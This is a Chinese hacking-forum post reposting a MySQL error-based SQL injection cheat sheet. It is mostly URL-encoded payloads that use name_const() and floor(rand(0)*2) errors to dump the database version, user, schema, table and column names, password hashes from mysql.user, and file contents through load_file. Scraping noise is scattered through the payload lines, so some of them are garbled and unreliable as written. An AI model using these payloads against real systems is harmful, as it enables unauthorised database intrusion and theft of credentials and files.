找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2208|回复: 0
打印 上一主题 下一主题

Mysql暴错注入参考(pdf)

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-27 11:00:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
& }0 J  R2 o1 e( F  ^/ F, z. _" j" v% G2 D( i4 d0 ?5 c  f$ P
/ V2 _! q, s5 o1 K
Mysql暴错注入参考(pdf),每天一贴。。。
) Z0 e9 s( T0 {8 H) Z# i$ G, Q$ k! o( d" m2 Q7 F( N& o
MySql Error Based Injection Reference
; E2 F: [- T( o7 P[Mysql暴错注入参考]) g& T. h9 N* R. `; E8 }
Authornig0s1992
" h  ^4 v0 W; g9 [* vBlog:http://pnig0s1992.blog.51cto.com/
6 ]9 G7 ~- b+ C7 r4 i- ^8 p) dTeAm:http://www.FreeBuf.com/) t$ N) \/ j! @; s" N# e
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
8 u8 G. T. ?& q9 n- {- k小部分版本使用name_const()时会报错.可以用给出的Method.2测试
8 w* ]+ b  j4 m查询版本:
+ j2 `( S6 B( y5 e! _- i  AMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
2 C& P8 t& n$ rjoin+(select+name_const(@@version,0))b)c)
. ~* v. U1 r* R, K* eMethod.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
/ y, @7 d5 Z; {; ^0 L# @; Cup by a)b)2 C. J+ [  t3 `" y% |; T
查询当前用户:
, ~2 s* z* X9 L8 H/ GMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
2 R! ^3 g' f2 _' r2 t' B- z! U4 k' vMethod.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r/ k$ F7 z! A1 @7 x$ J
and(0)*2))x+from+information_schema.tables+group+by+x)a)% A- D; C& Q2 P0 i/ ~) j2 y7 p
查询当前数据库:
4 |( ?" m4 `) M% M3 }. f( _Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
' l: j4 B4 T) g9 a* t) p/ TMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
& \" H1 d  z/ e4 z$ }& wor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
3 j& B0 ~1 w! y6 p依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+! I8 a% L; h" i% o' S! ~
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
0 o$ p  ?4 [: u6 Z! t$ X6 }顺序替换3 J- m" k5 v3 }3 i; A. a7 F
爆指定库数目:
) u$ b' M2 ^4 u# l% M8 ]and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t/ T( D8 d' p% f$ R, ]9 N5 _
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group) u# j8 ?, h! ^! c2 ]. i
+by+x)a)+and+1=1 0x6D7973716C=mysql3 W5 U  i1 @) I8 p
依次爆表:
. K$ p7 [% @9 j& a# F' Qand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t" d$ g  T: g5 Z# D; v/ M6 \( l
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta% n% I, k  e  r' N
bles+group+by+x)a)+and+1=1
- C( n  v- D! z; T4 A0x6D7973716C=Mysql 将n顺序替换
/ P- S% Y5 d" a: Z6 |5 b5 Y  C) m7 M爆表内字段数目:
9 C5 G9 n9 \4 ^7 B# U1 J) Yand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
9 r" a" k: U' U1 {/ f; W' X# [+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran: [5 Q2 T; n6 N! f
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
8 D& L5 o7 j& t依次爆字段:
3 z' x; I0 b' w  }/ Z8 aand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
  U8 B5 z7 i2 k1 t: f# p5 j, J+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,19 M3 h5 v' B( x* ~1 g; w
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
/ E, |) d3 a" C1 I依次暴内容:; s% M; @# o2 h# G
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
0 f* ]( Z/ A1 |ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=16 j  W8 @0 x7 c" \
将n顺序替换
0 \$ h+ v: l. E% g- l8 P4 o爆文件内容:* M9 R$ T$ P2 M- ?  [$ @
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
3 M, C( {! ^* }/ h9 _: `from+information_schema.tables+group+by+a)b) , O, R' b0 v, z9 r
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
- r/ i/ @5 T7 `" N3 l1 xThx for reading.( M, O: C5 N+ c
  r6 }$ X: U5 b, Z  \3 r. p& n2 L
不要下载也可以, ( S4 E5 a2 Z" f

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表